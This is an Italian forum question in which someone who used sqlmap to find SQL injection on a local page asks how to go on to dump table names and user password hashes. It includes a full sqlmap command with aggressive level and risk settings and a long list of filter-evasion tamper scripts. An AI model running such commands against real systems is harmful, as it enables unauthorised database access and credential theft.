Ho usato SQLMAP per verificare l'iniezione SQL. Sono riuscito a recuperare il nome di un solo database ( dbInfo )
Tuttavia, utilizzando SQLMAP I non è possibile enumerare nient'altro - dove sono le tabelle all'interno del DB o degli hash utente ... che è quello che voglio ottenere.
Qualche consiglio? Ecco cosa ho usato. Ho trovato un file sqldump.sql nella radice con il nome di due tabelle chiamate products e secrets se questo aiuta?
root@kali:~# sqlmap -t --cookie="PHPSESSID=XXX"
-u https://127.0.0.1/page.php
--data="timestamp=1461171839"
--method=POST
--threads=10
--no-cast
-D=dbInfo
tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes
--level=5
--risk=3
--dbms=mysql